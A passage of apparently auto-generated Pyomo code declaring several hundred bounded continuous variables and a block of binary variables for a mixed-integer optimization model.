m.x45 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x46 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x47 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x48 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x49 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x50 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x51 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x52 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x53 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x54 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x55 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x56 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x57 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x58 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x59 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x60 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x61 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x62 = Var(within=Reals,bounds=(0,40),initialize=0)
m.x63 = Var(within=Reals,bounds=(0,40),initialize=0)
m.x64 = Var(within=Reals,bounds=(0,40),initialize=0)
m.x65 = Var(within=Reals,bounds=(0,40),initialize=0)
m.x66 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x67 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x68 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x69 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x70 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x71 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x72 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x73 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x74 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x75 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x76 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x77 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x78 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x79 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x80 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x81 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x82 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x83 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x84 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x85 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x86 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x87 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x88 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x89 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x90 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x91 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x92 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x93 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x94 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x95 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x96 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x97 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x98 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x99 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x100 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x101 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x102 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x103 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x104 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x105 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x106 = Var(within=Reals,bounds=(0,30),initialize=0)
m.x107 = Var(within=Reals,bounds=(0,30),initialize=0)
m.x108 = Var(within=Reals,bounds=(0,30),initialize=0)
m.x109 = Var(within=Reals,bounds=(0,30),initialize=0)
m.x110 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x111 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x112 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x113 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x114 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x115 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x116 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x117 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x118 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x119 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x120 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x121 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x122 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x123 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x124 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x125 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x126 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x127 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x128 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x129 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x130 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x131 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x132 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x133 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x134 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x135 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x136 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x137 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x138 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x139 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x140 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x141 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x142 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x143 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x144 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x145 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x146 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x147 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x148 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x149 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x150 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x151 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x152 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x153 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x154 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x155 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x156 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x157 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x158 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x159 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x160 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x161 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x162 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x163 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x164 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x165 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x166 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x167 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x168 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x169 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x170 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x171 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x172 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x173 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x174 = Var(within=Reals,bounds=(0,20),initialize=0)
m.x175 = Var(within=Reals,bounds=(0,20),initialize=0)
m.x176 = Var(within=Reals,bounds=(0,20),initialize=0)
m.x177 = Var(within=Reals,bounds=(0,20),initialize=0)
m.x178 = Var(within=Reals,bounds=(0,20),initialize=0)
m.x179 = Var(within=Reals,bounds=(0,20),initialize=0)
m.x180 = Var(within=Reals,bounds=(0,20),initialize=0)
m.x181 = Var(within=Reals,bounds=(0,20),initialize=0)
m.x182 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x183 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x184 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x185 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x186 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x187 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x188 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x189 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x190 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x191 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x192 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x193 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x194 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x195 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x196 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x197 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x198 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x199 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x200 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x201 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x202 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x203 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x204 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x205 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x206 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x207 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x208 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x209 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x210 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x211 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x212 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x213 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x214 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x215 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x216 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x217 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x218 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x219 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x220 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x221 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x222 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x223 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x224 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x225 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x226 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x227 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x228 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x229 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x230 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x231 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x232 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x233 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x234 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x235 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x236 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x237 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x238 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x239 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x240 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x241 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x242 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x243 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x244 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x245 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x246 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x247 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x248 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x249 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x250 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x251 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x252 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x253 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x254 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x255 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x256 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x257 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x258 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x259 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x260 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x261 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x262 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x263 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x264 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x265 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x266 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x267 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x268 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x269 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x270 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x271 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x272 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x273 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x274 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x275 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x276 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x277 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x278 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x279 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x280 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x281 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x282 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x283 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x284 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x285 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x286 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x287 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x288 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x289 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x290 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x291 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x292 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x293 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x294 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x295 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x296 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x297 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x298 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x299 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x300 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x301 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x302 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x303 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x304 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x305 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x306 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x307 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x308 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x309 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x310 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x311 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x312 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x313 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x314 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x315 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x316 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x317 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x318 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x319 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x320 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x321 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x322 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x323 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x324 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x325 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x326 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x327 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x328 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x329 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x330 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x331 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x332 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x333 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x334 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x335 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x336 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x337 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x338 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x339 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x340 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x341 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x342 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x343 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x344 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x345 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x346 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x347 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x348 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x349 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x350 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x351 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x352 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x353 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x354 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x355 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x356 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x357 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x358 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x359 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x360 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x361 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x362 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x363 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x364 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x365 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x366 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x367 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x368 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x369 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x370 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x371 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x372 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x373 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x374 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x375 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x376 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x377 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x378 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x379 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x380 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x381 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x382 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x383 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x384 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x385 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x386 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x387 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x388 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x389 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x390 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x391 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x392 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x393 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x394 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x395 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x396 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x397 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x398 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x399 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x400 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x401 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x402 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x403 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x404 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x405 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x406 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x407 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x408 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x409 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x410 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x411 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x412 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x413 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x414 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x415 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x416 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x417 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x418 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x419 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x420 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x421 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x422 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x423 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x424 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x425 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x426 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x427 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x428 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x429 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x430 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x431 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x432 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x433 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x434 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x435 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x436 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x437 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x438 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x439 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x440 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x441 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x442 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x443 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x444 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x445 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x446 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x447 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x448 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x449 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x450 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x451 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x452 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x453 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x454 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x455 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x456 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x457 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x458 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x459 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x460 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x461 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x462 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x463 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x464 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x465 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x466 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x467 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x468 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x469 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x470 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x471 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x472 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x473 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x474 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x475 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x476 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x477 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x478 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x479 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x480 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x481 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x482 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x483 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x484 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x485 = Var(within=Reals,bounds=(0,None),initialize=0)
m.b486 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b487 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b488 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b489 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b490 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b491 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b492 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b493 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b494 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b495 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b496 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b497 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b498 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b499 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b500 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b501 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b502 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b503 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b504 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b505 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b506 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b507 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b508 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b509 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b510 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b511 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b512 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b513 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b514 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b515 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b516 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b517 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b518 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b519 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b520 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b521 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b522 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b523 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b524 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b525 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b526 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b527 = Var(within=Binary,bounds=(0,1),initialize=0)
